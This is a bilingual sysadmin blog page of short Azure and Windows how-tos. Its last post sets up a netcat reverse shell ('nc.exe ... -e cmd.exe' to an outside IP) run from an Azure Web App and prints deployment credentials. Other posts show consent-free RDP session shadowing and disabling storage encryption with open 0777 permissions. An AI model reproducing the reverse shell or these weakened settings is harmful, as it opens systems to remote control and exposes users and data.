Wiedza
  • 0 Koszyk
  • Kontakt
  • Moje konto
  • Blog
  • MOC On-Demand – co to takiego?
  • MOC On-Demand – Co zyskujesz?
  • Kursy MS

Update ADFS 3.0 Communication Certificate

The best way is to use this scrip: https://gallery.technet.microsoft.com/scriptcenter/Update-the-Service-9e080ef8

If fail – Run the script as a local admin account – not a domain.

You can finish manually it by local admin account:

Set-AdfsSslCertificate -Thumbprint 2b02128a3fc867c65200e27bb1c25023d339f372

And as a domain account:

Set-AdfsCertificate -CertificateType Service-Communications –Thumbprint 2b02128a3fc867c65200e27bb1c25023d339f372

Intune – Remove User – Remove-LocalUser : The term ‘Remove-LocalUser’ is not recognized as the name of a cmdlet, function, script file

I tried to use PowerShell script via Intune that remove my user from Windows Endpoint using powershell command

Remove-LocalUser -Name “myuser”.

It was not working, just because:

, error = Remove-LocalUser : The term ‘Remove-LocalUser’ is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At C:\Program Files (x86)\Microsoft Intune Management
Extension\Policies\Scripts\05b2518c-c36d-4a05-84f7-6fac956d4cc6_c293361b-b3d3-48d9-8aca-f8ccf0a11330.ps1:1 char:1
+ Remove-LocalUser -Name “myuser”
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Remove-LocalUser:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

So the workaround is using this:

“net user myuser /DELETE”|cmd

All script:

$op = Get-LocalUSer | where-Object Name -eq “myuser” | Measure
if ($op.Count -eq 0) {
Write-Host “No User to Remove”
} else {
“net user myuser /DELETE”|cmd
Write-Host “User myuser has been Removed”
}

Recovery Services vault – How to Disable Backup, Move to a new Recovery Services vault

1. Stop Backup – without Erasing Data
2. Disable Soft Deletion in Recovery Service VaultId


3. Execute Script:

$RG=backup-mig
$Vault=backup-mig
$VMName=medicareiisql
$vault = Get-AzRecoveryServicesVault -ResourceGroupName $RG -Name $Vault
$Container = Get-AzRecoveryServicesBackupContainer -ContainerType AzureVM -Status Registered -VaultId $vault.ID -FriendlyName $VMName
$BackupItem = Get-AzRecoveryServicesBackupItem -Container $Container -WorkloadType AzureVM -VaultId $vault.ID
Disable-AzRecoveryServicesBackupProtection -Item $BackupItem -VaultId $vault.ID -RemoveRecoveryPoints -Force

MS SQL also Express on Azure VM – TempDB on ephemeral local disk

Fast SQL on Azure – nutshell:

  • TempDB on fast local disk
  • At least 3 disks for data and logs
  • Read-only caching for data disks

One of the most important things for SQL Server is to store TempDB on a fast ephemeral local – temporary disk. How to do it:

Install SQL and configure it to use D:\TempDB for TempDB.

Create two files on c: dirive:

StartSQL.bat:

PowerShell -Command “Set-ExecutionPolicy Unrestricted” >> “%TEMP%\StartupLog.txt” 2>&1

PowerShell C:\StartSQL.ps1 >> “%TEMP%\StartupLog.txt” 2>&1

StartSQL.ps1:

PowerShell -Command “Set-ExecutionPolicy Unrestricted” >> “%TEMP%\StartupLog.txt” 2>&1

PowerShell C:\StartSQL.ps1 >> “%TEMP%\StartupLog.txt” 2>&1

StartSQL.ps1:

$SQLService=”SQL Server (MSSQLSERVER)”

$SQLAgentService=”SQL Server Agent (MSSQLSERVER)”

$tempfolder=”D:\SQLTEMP”

if (!(test-path -path $tempfolder)) {

New-Item -ItemType directory -Path $tempfolder

}

Start-Service $SQLService

#Start-Service $SQLAgentService #remove # for non Express version

 

Set Startup Type – Manual for the following Services:

  • SQL Server (MSSQLSERVER)
  • SQL Server Agent (MSSQLSERVER)

Configure Task Scheduler (Run as SYSTEM with highest privileges):

Additional tip is to use at least 3 disks for Data and Logs. Just create 3 data disk and run this PowerShell that configure it for you:

$disks = Get-PhysicalDisk -CanPool $true

New-StoragePool –FriendlyName StoragePool1 –StorageSubsystemFriendlyName “*” –PhysicalDisks (Get-PhysicalDisk –CanPool $True)

New-VirtualDisk -FriendlyName “sql-stripe” -StoragePoolFriendlyName “StoragePool1” -Interleave 65536 -AutoNumberOfColumns -ProvisioningType Fixed -ResiliencySettingName “Simple” -UseMaximumSize

Get-VirtualDisk –FriendlyName sql-stripe | Get-Disk | Initialize-Disk –Passthru | New-Partition -DriveLetter F –UseMaximumSize | Format-Volume

 

Enable read-only caching on the disk(s) hosting the data files.

 

More information: https://docs.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/performance-guidelines-best-practices

WebPage for stopping and starting Azure VMs / WWW pozwalająca zatrzymywać i uruchamiać maszyny wirtualne

WebPage for stopping and starting Azure VMs

Quite often, there are cases of requests to do various types of automation that allow you to start and stop virtual machines by people who do not have access to the Azure environment.

I do not think that it is a very safe solution, but it may be useful to someone – and certainly for training purposes regarding:

  • Static Web Apps
  • Azure identity platform and authorization services – App Registrations
  • identity and access management (IAM)

https://github.com/MariuszFerdyn/AzureStartStopVM

 

WWW pozwalająca zatrzymywać i uruchamiać maszyny wirtualne

 

Dosyć często mi się zdarzają przypadki próśb robienia różnego rodzaju automation, które pozwalają uruchamiać i zatrzymywać maszyny wirtualne poprzez osoby które nie mają dostępu do środowiska Azure.

Nie uważam, że to zbytnio bezpieczne rozwiązanie, ale może się komuś przyda – a już na pewno w celach szkoleniowych dotyczących:

  • Static Web Apps
  • Azure identity platform and authorization services – App Registrations
  • identity and access management (IAM)

https://github.com/MariuszFerdyn/AzureStartStopVM

Group Policy – Merging / Scalanie GPO

Recently, he has been dealing with broadly understood security. Everyone is talking about Cloud Security these days, but sometimes you have to go back to the sources! In most large companies, the basic element of security should be the appropriate configuration of workstations and if we have thousands of them, GPO is of course. Of course, GPO helps to grasp the world of workstations and security, but let’s remember about security – and as much as we have to say here – it’s worth seeing for the CIS:

https://www.cisecurity.org/cis-securesuite/cis-securesuite-build-kit-content/

Safety for:

  • Microsoft Internet Explorer 9
  • Microsoft Internet Explorer 10
  • Microsoft Internet Explorer 11
  • Microsoft Office 2013
  • Microsoft Office 2016
  • Microsoft Office Access 2013
  • Microsoft Office 2016
  • Microsoft Office Excel 2013
  • Microsoft Office Excel 2016
  • Microsoft Office PowerPoint 2013
  • Microsoft Office PowerPoint 2016
  • Microsoft Office Word 2013
  • Microsoft Office Word 2016
  • Microsoft Outlook 2013
  • Microsoft Outlook 2016
  • Microsoft Windows XP
  • Microsoft Windows 7
  • Microsoft Windows 8
  • Microsoft Windows 8.1
  • Microsoft Windows 10 Enterprise
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019

Real Example:

When we download these policies they are split between Computer, Users, category, so sometimes we need to merge it, especially for LoopBack processing (VDI). There are some Community Power Shell scripts, but I do not trust script from the internet – I prefer to use a well known brand like Microsoft. BTW: If you do not trust your Computer Vendor or Microsoft you must change them.

For merging GPO you can use Microsoft Security Compliance Manager (https://www.microsoft.com/en-us/download/details.aspx?id=53353). You can install it on Windows 10.

The process of merging GPO is:

  1. Create a Backup of GPO that you want to merge (Group Policy Management).
  2. Run Microsoft Security Compliance Manager
  3. Import Policies to Merge

  4. Select policy and Select Compare / Merge

  5. Select policy to Merge

  6. Select Merge Baselines

  7. Finally, just Export it as a backup and import it to Group Policy Management.

This doesn’t work for Preferences.

Ostatnimi czasy zajmuje się szeroko pojętym bezpieczeństwem. Każdy obecnie mówi o Cloud Security, ale czasami trzeba wrócić do źródeł! W większości dużych firm podstawowym elementem bezpieczeństwa powinna być odpowiednia konfiguracja stacji roboczych i jak ich mamy tysiące to oczywiście GPO. Oczywiście, że GPO pomaga w ogarnięciu świata stacji roboczych i bezpieczeństwa, ale pamiętajmy o bezpieczeństwie – a ile tutaj mamy do powiedzenia – warto zobaczyć do CIS:

https://www.cisecurity.org/cis-securesuite/cis-securesuite-build-kit-content/

Kiedy pobieramy powyższe GPO, są one dzielone na sekcje Computer Settings , User następnie na kategorię. Czasami musimy je scalić, szczególnie w przypadku przetwarzania LoopBack (VDI). Istnieje kilka skryptów Power Shell to robiących, ale w obecnych czasach trudno ufać skryptom z internetu bez szczegłowej analizy, tak więc proponuje skorzystać z Microsoft Security Compliance Manager (https://www.microsoft.com/en-us/download/details.aspx?id=53353). Można go zainstalować w systemie Windows 10.

Proces łączenia GPO to:

1. Utwórz kopię zapasową GPO do scalenia.

2. Uruchom z Microsoft Security Compliance Manager

3. Importuj GPO

4. Wybierz GPO, a następnie Compare / Merge

5. Wybierz GPO do scalenia

6. Wybierz Mergre Baselines

7. Na koniec wyeksportuj GPO jako kopię zapasową i zaimportuj.

Powyższa procedura nie działa dla Preferences.

IoT Solution Concept with using Raspberry PI as a Gateway connected to two different WiFi at the same time

When you design IoT solutions there are two methods, you can connect IoT devices directly to the Azure IoT Central or Azure IoT Hub or you can connect it via Gateway.

For a Gateway, you can use a LowCost computer/Controler like a Rasberry Pi. IoT devices can connect to Gateway the following protocols:

  • WiFi Internal wlan1
  • Bluetooth
  • Bluetooth Lowe Energy

And the more complicated is connecting Gateway to the Azure IoT Hub or Azure IoT Central or any other Service in Cloud. We can use the following:

  • WiFi External wlan0
  • Ethernet
  • GPRS
  • LoRaWAN

Sample diagram:

You can use WiFi for both – the same card but a different frequency (2,4 GHz/5 GHz) or just two different WiFi cards.

In case of using two different network cards that allow connecting Raspberry Pi to two different WiFi at the same you must use similar configuration to that one (file /etc/network/interfaces):

root@raspberrypi:~# cat /etc/network/interfaces
auto lo

iface lo inet loopback
iface eth0 inet dhcp

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid fastsmsnet2
wpa-psk wifi-password

auto wlan1
allow-hotplug wlan1
iface wlan1 inet dhcp
wireless-essid TELLO-5A2CAA

 

# interfaces(5) file used by ifup(8) and ifdown(8)

# Please note that this file is written to be used with dhcpcd
# For static IP, consult /etc/dhcpcd.conf and ‘man dhcpcd.conf’

 

# Include files from /etc/network/interfaces.d:
#source-directory /etc/network/interfaces.d
root@raspberrypi:~#

PS: As you see this Gateway will be used as a Drone Controller.

Azure Application Gateway – The root certificate of the server certificate used by the backend does not match the trusted root certificate added to the application gateway.

If you see the problem with this error using Azure Application Gateway v2:

The root certificate of the server certificate used by the backend does not match the trusted root certificate added to the application gateway. Ensure that you add the correct root certificate to whitelist the backend

Just check if your backend web server does not issue a single-level certificate. If not you can check the following (if so read to the end):

Just create another listener that use e.g. 80 port – it will not be used – just we need to delete everything that it is connected with existing 443 listeners, including Health Checks and Rules. You can also delete the Application Gateway and create a new one that uses only 80/http protocol.

Run the following script:

Connect-AzAccount
$appgwName=”mariuszcert-appgateway”
$resgpName=”MariusCertTest”
$certName=”RootPrivateCert”
$gw = Get-AzApplicationGateway -Name $appgwName -ResourceGroupName $resgpName
$gw = Add-AzApplicationGatewayTrustedRootCertificate -ApplicationGateway $gw -Name $certName -CertificateFile “c:\ privatecer.cer”
$gw = Add-AzApplicationGatewayBackendHttpSettings -ApplicationGateway $gw -Name “dwa” -Port 443 -Protocol Https -CookieBasedAffinity Enabled -PickHostNameFromBackendAddress -TrustedRootCertificate $gw.TrustedRootCertificates[0]
$gw = Set-AzApplicationGateway -ApplicationGateway $gw

Now you can add Listener and rules, similar to this one:

Add Rules for https (443):

And after that, you can delete rules and listeners connected with 80 port.

If you still see the error – the final solution is to create Application Gateway Ver1 (Standard). Just because it will not need root certificates, so it can work with one level certificates.

Remote Desktop (RDP) – Shadow Session – Podglądanie Sesji

Sometimes we need to see what the user is doing on the remote desktop session. How to do it:

Connect to remote desktop:

Run cmd.exe and issue:

query session

You should see all sessions, like here:

Connect to the session:

mstsc /shadow:session_id

mstsc /shadow:16 /noConsentPrompt – without user prompt about a connection (you must set it in GPO)

mstsc /shadow:16 /control – you can also control the user session.

GPO settings:
Computer Configuration>Policies>Administrative Templates>Windows Components>Remote Desktop Services>Remote Desktop Session Host>Connections

Set rules for remote control of Remote Desktop Services user sessions>Enabled>Full Control with User’s Permission, like here:


Czasami musimy zobaczyć, co robi użytkownik w sesji zdalnego pulpitu. Jak to zrobić:

Połącz się ze zdalnym pulpitem:

Uruchom cmd.exe i wydaj:

query session

Powinieneś zobaczyć wszystkie sesje, takie jak tutaj:

Połącz się z sesją:

mstsc /shadow: id_sesji

mstsc /shadow:16 / noConsentPrompt – bez pytania użytkownika o połączenie (należy ustawić możliwość w GPO)

mstsc / shadow:16 / control – możesz także kontrolować sesję użytkownika.

Ustawienia GPO:

Learning Download Center – Access Denied

If you are MCT (Microsoft Certified Trainer) and can not access to the Learning Download Center (https://learningdownloadcenter.microsoft.com/) and see the error:

Access Denied
Microsoft Certified Trainers should login with Microsoft Certification Account.
Microsoft Partners should login with their active Microsoft Partner Account. For more information on Microsoft Partner Account click here.
For further support please contact Microsoft Support.

You have to:

  1. Visit the MicrosoftCertification Dashboard Migrate Page (https://mcp.microsoft.com/MCP/Home/Migrate) using Internet Explorer (recommended browser).
  2. Sign in with your preferred Microsoft account and password that you would like to link with your Microsoft Certification profile
  3. Enter the Access Code along with the MC ID to have your Microsoft account associated with your Microsoft Certification record. The access code you must acquire by creating New Discussion on Microsoft Trainer Forum (https://trainingsupport.microsoft.com/en-us/tcmct/forum). It is the only way to get support with this and you receive it via Private Message – Yes there is functionality with private messages – look at the topic you will create there will be the sign Private Message.

Microsoft Azure Recovery Services (MARS) agent – z dziennika wdrożeniowca / from the Azure Administrator Jurnal

Jeżeli nie możesz uwierzytelnić się w Recovery Services vault upewnij się, że czas na serwerze jest prawidłowo ustawiony. Agent generuje TOKEN SAS, który jest ważny godzinę na podstawie zegara w AZURE i jeżeli na serwerze rozjazd czasu będzie ponad godzinę nie uda się uwierzytelnić.

Zazwyczaj towarzyszy temu błąd:

Invalid vault credentials provided. The file is either corrupted or does not have the latest credentials associated with recovery service. (ID: 34513) We recommend you download a new vault credentials file from the portal and use it within 2 days.

Logi przechowywane są w C:\Program Files\Microsoft Azure Recovery Service Agent\temp

I prawdopodobnie w pliku CBEngineCurr.errlog znajdziecie coś podobnego do:

Client assertion is not within its valid time range. Current time: 2020-06-27T17:23:32.8614131Z, expiry time of assertion 2020-06-27T16:34:05.0000000Z.

Jeżeli backup System State zakończy się błędem:

Error in backup of C:\windows\systemroot\ during enumerate: Error [0x8007007b] The filename, directory name, or volume label syntax is incorrect.

Należy poprawić wpisy sterowników wykorzystywanych przez mechanizm VSS – wg dokumentu:

https://support.microsoft.com/en-us/help/4053355/microsoft-azure-recovery-services-agent-system-state-backup-failure

należy to zrobić dla wszystkich sterowników, w których znajdziemy w rejestrze poprzedzające „/”.

 


If you cannot authenticate with Recovery Services vault, make sure the server time is set correctly. The agent generates SAS TOKENS, which is a valid for one hour, and if the time on server is different more than one hour it will not be able to authenticate.

The error you can see is:

Invalid vault credentials provided. The file is either corrupted or does not have the latest credentials associated with recovery service. (ID: 34513) We recommend you download a new vault credentials file from the portal and use it within 2 days.

If the System State backup ends with an error:

Error in backup of C:\windows\systemroot\ during enumerate: Error [0x8007007b] The filename, directory name, or volume label syntax is incorrect.

You need to fix VSS writers entries in registry (remove all leading “/”) according to the https://support.microsoft.com/en-us/help/4053355/microsoft-azure-recovery-services-agent-system-state-backup-failure.

 

Windows 10 and Windows 2016,2019 – NAT

If someone comes to putting VM on VM (Nested Virtualization – already possible in Azure on Dv3 machines), it will probably be useful using NAT – how to run Win2016 and Win10 Step by Step:

New-VMSwitch –SwitchName “NAT” –SwitchType Internal

New-NetIPAddress –IPAddress 172.16.0.1 -PrefixLength 24 -InterfaceAlias “vEthernet (NAT)”

New-NetNat –Name NATnetwork –InternalIPInterfaceAddressPrefix 172.16.0.0/24

 

You can also use it in your laptop.

 

Z dziennika wdrożeniowca – jak komuś przyjdzie stawiać VM na VM (Nested Virtualisation – już możliwe na maszynach Dv3 w Azure) zapewne przyda mu się NAT – jak uruchomić w Win2016 i Win10 Step by Step:

New-VMSwitch –SwitchName “NAT” –SwitchType Internal

New-NetIPAddress –IPAddress 172.16.0.1 -PrefixLength 24 -InterfaceAlias “vEthernet (NAT)”

New-NetNat –Name NATnetwork –InternalIPInterfaceAddressPrefix 172.16.0.0/24

 

Powyższe można oczywiście używać na laptopie.

 

How to get AKS cluster – Provisioning State: Scaling – back to live

Sometime during scaling operation on Azure Kubernetes Services, it hangs on  Provisioning State: Scaling.

Manually deleting VMs from the MC* group may have had some impact as well on this operation.

Solution: Upgrade the AKS cluster to the same Kubernetes version it is currently in (in this case, 1.13.5) from Azure CLI or CloudShell.

Step by step:

az aks upgrade –resource-group myResourceGroup –name myAKSCluster –kubernetes-version 1.13.10

Check status:

az aks show –resource-group myResourceGroup –name myAKSCluster –output table

More information here.

Windows Virtual Desktop | Microsoft Azure – resources / materiały

Podczas wirtualnego spotkania Warszawskiej Grupy Użytkowników i Specjalistów Windows (WGUiSW) w ramach cyklu Microsoft Azure w Twojej Firmie oraz moich wynurzeń w ramach “Z dziennika Wdrożeniowca” prezentowałem możliwości Windows Virtual Desktop.

Jednocześnie przekazuje zestawienie dodatkowych materiałów opublikowanych przez Christiaan’a z MS:

Ignite the Tour session + deck (2019 fall release):
https://techcommunity.microsoft.com/t5/microsoft-ignite-the-tour-2019/a-real-world-look-at-windows-virtual-desktop-the-best/m-p/1111711

How to migrate Virtual Desktop Infrastructure (VDI) to Azure and Windows Virtual Desktop (2020 – spring update):
https://www.youtube.com/watch?v=rkKaWT-tN54

Windows Virtual Desktop updates for admins (2020 – spring update):
https://www.youtube.com/watch?v=zmsTD9Hd-xY&t=1s

You can watch all the recordings (including comprehensive demos) in HQ of our last Virtual event: Accelerate Your Windows Virtual Desktop Deployment. (2020 – spring update) (Register and the on-demand link will return via email):
https://info.microsoft.com/ww-registration-windows-virtual-desktop-virtual-event.html?ocid=AID3008891_QSG_BLOG_405824

I materiały dla partnerów / Resources for MS partners:

List of resources for partners, including a technical level 100 and 300 deep-dive deck (2019 fall release):
https://www.microsoft.com/azure/partners/b/migrate/windows-virtual-desktop

Pamiętajmy również o WVD Management UX / Do not forget about WVD Management UX:
https://github.com/Azure/RDS-Templates/tree/master/wvd-templates/wvd-management-ux/

I mój poprzedni materiał dotyczący Windows Virtual Desktop / My previous post about Windows Virtual Desktop:

Migrating Existing RDS environment to Windows Desktop in Azure

Windows Server 2019 + Docker Desktop – AutoStart at startup (boot) computer

From the 2016 year, you can run Linux Containers on Windows 7 from the 2018 year using Windows Server 2019 you can use Linux Container on Windows Server.

Some companies don’t accept Linux on their environment – so in this case, we can run Linux Containers on Windows Server 2019. There is a method on how can we start a docker-composer at Windows Startup (booting computer).

Create a startup file:

E.g. in C:\tmp\bloom_onPrem\startup.ps1

Write-Host “Waiting 180 sec…”
start “C:\Program Files\Docker\Docker\Docker Desktop.exe”
start-service -Name com.docker.service
Start-Sleep 300
Write-Host “Starting containers…”
docker-compose –file c:\tmp\bloom_onPrem\docker-compose.yml up -d
Write-Host “Waiting 15 sec…”
Start-Sleep 15

To start it automatically when the server boot create ScheduledJob with New-JobTrigger – like here:

Open PowerShell as an Administrator and do:

$trigger = New-JobTrigger -AtStartup -RandomDelay 00:00:30
Register-ScheduledJob -Trigger $trigger -FilePath C:\tmp\bloom_onPrem\startup.ps1 -Name BloomOnPrem

Display Scheduled Job:

Get-ScheduledJob

or

Get-ScheduledJob|Get-JobTrigger

You can view this definition in Task Scheduler:

BTW: stop.bat file can be:

docker-compose –file c:\tmp\bloom_onPrem\docker-compose.yml down
pause

You can expose your containers to the internet using IIS Reverse Proxy:

https://docs.microsoft.com/en-us/iis/extensions/url-rewrite-module/reverse-proxy-with-url-rewrite-v2-and-application-request-routing

PowerShell and .Net for Jupyter Notebooks – Azure Notebooks what’s is the future?

Już jakiś czas temu zrobił się modny temat wykorzystania Jupyter Notebooks, które to rozwiązanie pozwala na dodawanie działającego na żywo kodu aplikacji do wyświetlanej właśnie dokumentacji. Co więcej wynik działania kodu od razu jest widoczny w dokumentacji – tak jak poniżej:

Warto wspomnieć, iż Notebooki mogą również wyświetlać grafikę i dlatego właśnie osoby przygotowujący modele AI tak bardzo pokochały Jupyter notebooks:

O ile dla Python, F# i języka R Jupyter Notebook’i były dostępne od dawna, o tyle zupełnie niezauważenie przeszła informacja, iż funkcjonalność dostępna jest dla PowerShell no i od dłuższego czasu dla .NET. Możemy to poćwiczyć używając linku:

https://mybinder.org/v2/gh/dotnet/interactive/master?urlpath=lab

Warto wspomnieć, że od dłuższego czasu do dyspozycji mamy Azure Notebooks Preview – czekam, aż zostanie zintegrowane z CloudShell i pięknie będzie można publikować ćwiczenia i konfiguracje do Azure.
A tutaj można zobaczyć, jak to działa – tylko proszę się zalogować używając swojego konta organizacji, aby móc wykonać kod poprzez wciśnięcie Shift i Enter:

https://azurenotebooks-mariuszferdyn.notebooks.azure.com/j/lab/tree/KolejnaLiczba.ipynb

A tak na marginesie dzieci od dawna uczyły się Pythona używając bardzo fajnego rozwiązania rodem z Runestone Interactive, a mianowicie:

http://python.oeiizk.edu.pl/ematerialy/python_obliczenia/0_piaskownica.html#


Jupyter Notebooks became popular that allows us to add live application code to the documentation being displayed. What’s more, the result of the running code is immediately visible in the documentation – as below:

Notebooks can also display graphics, that’s why people preparing AI models loved Jupyter Notebooks so much:

Jupyter Notebooks have been available for a long time for Python, F # and R language, but the information that the functionality has been available for PowerShell and for.NET has gone unnoticed. We can practice this using this link:

https://mybinder.org/v2/gh/dotnet/interactive/master?urlpath=lab

It is worth mentioning that Azure Notebooks Preview has been available for a long time – I am waiting for integration with CloudShell and we will be able to publish Azure exercises and configurations using live bricks.

Here you can see how it works – just log in using your organization account to be able to execute the code by pressing Shift-Enter:

https://azurenotebooks-mariuszferdyn.notebooks.azure.com/j/lab/tree/KolejnaLiczba.ipynb

By the way, children can use other Python Web tools with turtle like:

http://python.oeiizk.edu.pl/ematerialy/python_obliczenia/0_piaskownica.html#

How to create Azure Monitor Alerts based on policy definitions?

  1. First of all, you need to have Log Analytics Workspace with logs from Activity log:

    More info: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/activity-log-collect

  2. Please go to Monitor.
  3. Go to Tab Alerts (You can go to directly to this link: https://portal.azure.com/#blade/Microsoft_Azure_Monitoring/AzureMonitoringBrowseBlade/alertsV2)
  4. Press New alert rule
  5. Press Resource
  6. Select subscription and Log Analytics that have like here:

     

     

  7. To use custom queries, you should be able to see here something like this:

  8. Choose:

  9. Select
  10. Type a query e.g.: AzureActivity| where TimeGenerated > ago(60d) and OperationNameValue starts with “Microsoft.Authorization/roleDefinitions/write”
  11. Configure e.g. Number of results greater than 0. Period and Frequency.
  12. Create action groups – who should receive alerts.
  13. Specify Subject line and Alert rule name
  14. Save Alert

References 1: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/activity-log-collect

References 2: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/alerts-log

DevExpress – Error: Unable to get property ‘validator’ of undefined or null reference

In case of Error:

Error: Unable to get property ‘validator’ of undefined or null reference

Add to web.config (at the end in <devExpress> section):

<resources>

<add
type=“ThirdParty“ />

<add
type=“DevExtreme“ />

</resources>

Like here:

DevExpress – Incorrect route to ASPxUploadProgressHandlerPage.ashx

In case of error:

System.Exception

Incorrect route to ASPxUploadProgressHandlerPage.ashx. Please use the IgnoreRoute method to ignore this handler’s route when processing requests.

Please edit file RouteConfig.cs adding:

routes.IgnoreRoute(“{resource}.aspx/{*pathInfo}”);

routes.IgnoreRoute(“{resource}.asmx/{*pathInfo}”);

routes.IgnoreRoute(“{resource}.ashx/{*pathInfo}”);

Like this:

Please do not forget add to Layout file:


@Html.DevExpress().GetStyleSheets(


new StyleSheet { ExtensionSuite = ExtensionSuite.NavigationAndLayout },


new StyleSheet { ExtensionSuite = ExtensionSuite.Editors }

)


@Html.DevExpress().GetScripts(


new Script { ExtensionSuite = ExtensionSuite.NavigationAndLayout },


new Script { ExtensionSuite = ExtensionSuite.Editors }

)

Like this:

Linux Azure Files mount problem

In the case of:

mount error(13): Permission denied

or

mount error(16): Device or resource busy

probably your kernel doesn’t support encryption CIFS, so please Disable “Secure transfer required”

And use this command:

sudo mount -t cifs //STORAGEACCOUNTNAME.file.core.windows.net/SHARENAME /mnt -o vers=2.1,username=YOUR_PASSWORD_ENDING==,dir_mode=0777,file_mode=0777,sec=ntlmssp

An unencrypted transfer is working only in the same region where is your VM.

If you receive something like this:

mount: wrong fs type, bad option, bad superblock on

you need to install cifs:

sudo apt install cifs-utils

Troubleshooter:

https://gallery.technet.microsoft.com/Troubleshooting-tool-for-02184089

Magento install on Azure WebApp + Azure Database for MariaDB/MySQL server

If you try to install Magento in a normal way on Microsoft Azure WebApp using MariaDB or MySQL probably receive an error:

 

[ERROR] Magento\Eav\Model\Entity\Attribute\Exception: Warning: SessionHandler::read(): Session data file is not created by your uid in /home/site/wwwroot/vendor/magento/framework/Session/SaveHandler/Native.php on line 22 in /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php:121Stack trace:#0 /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/Dynamic/Developer.php(66): Magento\Framework\ObjectManager\Factory\AbstractFactory-

 

The solution is quite simple just select that you store sessions on DB instead files. After installation you can move it to Redis or to files adding:

session.save_handler = files

session.save_path = “var/www/magento2/var/session”

 

to the .user.ini file.

 

The next error you see it is connected with DB permission:

General error: 1419 You do not have the SUPER privilege and

The solution is quite simple just modify log_bin_trust_function_creators to ON in DB parameters in Azure Portal.

 

GCP App Engine via Cloud Flare – Step by Step

Usually, it is wise to protect your application against DDOS, XSS and SQL injections and so on. Unfortunately, at this moment it is impossible to use Google Cloud Armor with Google App Engine. The one solution can use Azure Application Gateway with WAF or Cloud Flare. How to configure Cloud Flare with App Engine – Step by Step:

  1. As usual, you must delegate DNS zone to Cloud Flare – it is easy to process after you register in Clod Flare.
  2. On Google Cloud Console – go to App Engine panel, Setting and Custom domains and you must add Custom Doman.
  3. You need to Verify a new domain, by adding the TXT record to your DNS settings. You do it in Cloud Flare. Please remember if you are adding it to the subdomain e.g. cc.wiadk.pl, you need to add TXT record to subdomain cc.wiadki.pl.
    If you have a problem with it you can switch to add CNAME record. That’s works better for me.
  4. After Verifying domain Google will create an SSL certificate for your domain for it, but it not works with Cloud Flare at this moment, so you need to disable SSL security like here:

  5. Now you can add A records in Cloud Flare:

    You can also add IPV6 addresses.

  6. During my test, Full End-To-end encryption didn’t work for me so we need to go to SSL/TLS settings and select flexible mode – like here:

    If you want to use Flexible mode only for one subdomain you can do it by using Pages Rules like here:

    In this way, only cc.wiadki.pl will be without end-to-end encryption.

  7. You can also use option Always use HTTPS to redirect from HTTP to HTTPS using Pages Rules like here:

    Or for all entries in your domain in SSL/TLS – Edge Certificates Settings:

     

    So for some time you can visit and test how this App Engine page works through Cloud Flare proxy:

    https://cc.wiadki.pl/

     

     

    After you enable Cloud Flare for App Engine please remember that App Engine still will be available using *.appspot.com address so please protect it using Client Certificate, Reverse Connection or at least IP restriction https://www.cloudflare.com/ips/.

     

    More info:

    https://support.cloudflare.com/hc/en-us/articles/200170166-Best-Practices-DDoS-preventative-measures

     

     

     

Certificate-based authentication for an Azure

Certificate-based authentication for an Azure
The best idea to authenticate for an Azure from application is to use Managed Identity. But sometimes it is not possible (e.g. On-Prem), so more secure way is to use certificate-based authentication than secret (password).

Here is a quick manual:

#Create Certificate
New-SelfSignedCertificate -Subject “CN=CertForMyApp” -CertStoreLocation “Cert:\CurrentUser\My” -KeyExportPolicy Exportable -KeySpec Signature
#Export Certificate from Store (mmc command)
#Create App registrations (portal.azure.com)
#Upload Certificate (portal.azure.com)
#Assign Permission (portal.azure.com)
#Check local Certificates
Get-ChildItem Cert:\ -Recurse|Select-String C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318
#Connect to Azure
Connect-AzAccount -ApplicationId f3ac2214-e37b-4f3e-9023-29abad27c8 -Tenant e9823fe4-675d-4843-a547-4154fc131c -CertificateThumbprint C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318

How to create Custom Read-Write role for Blob Storage in Azure

The best way is to use PowerShell Cloud Shell. Prepare environment:

cd \home
mkdir workingdir
cd workingdir

Write existing role to JSON format:

get-azroledefinition -Name “Storage Blob data Contributor”|ConvertTo-Json|Out-File ReadWriteRole.json

Edit the file by using (IsCustom set to true, put AssignableScope with correct subscription, delete unnecessary actions, give a new Name and description, Id is not important):

vi ReadWriteRole.json

{
“Name”: “Custom Role Storage Blob Read Write”,
“Id”: “ba92f5b4-2d11-453d-a403-e96b0029c9fe”,
“IsCustom”: true,
“Description”: “Custom Role Allows for read, write access to Azure Storage blob containers and data”,
“Actions”: [
“Microsoft.Storage/storageAccounts/blobServices/containers/read”,
“Microsoft.Storage/storageAccounts/blobServices/containers/write”,
“Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action”
],
“NotActions”: [],
“DataActions”: [
“Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read”,
“Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write”
],
“NotDataActions”: [],
“AssignableScopes”: [
“/subscriptions/4b1caf79-6e4c-49d-8160-5853298”
]
}

Exit editing file by pressing Escape, :, wq, enter

Add New Custom Role:

New-AzRoleDefinition -InputFile ReadWriteRole.json

Display All Custom Roles:

Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

And now you can use new Custom Role in Portal.

Reverse shell from Azure Web App via Web Hook

In this article I present idea about running NetCat in Web App and in this way access to the shell. If you need it to work this solution can be more comfortable. Just create start.bat like this:

d:\home\site\wwwroot\nc.exe 40.113.139.194 443 -e cmd.exe

and upload it as a WebJob to the Web App.

And in this way, you can always invoke it using and make connection to the shell:

$username = “`$webapprg09”
$password = “vzcXNeXmoltECLoALtLrYeincorect”
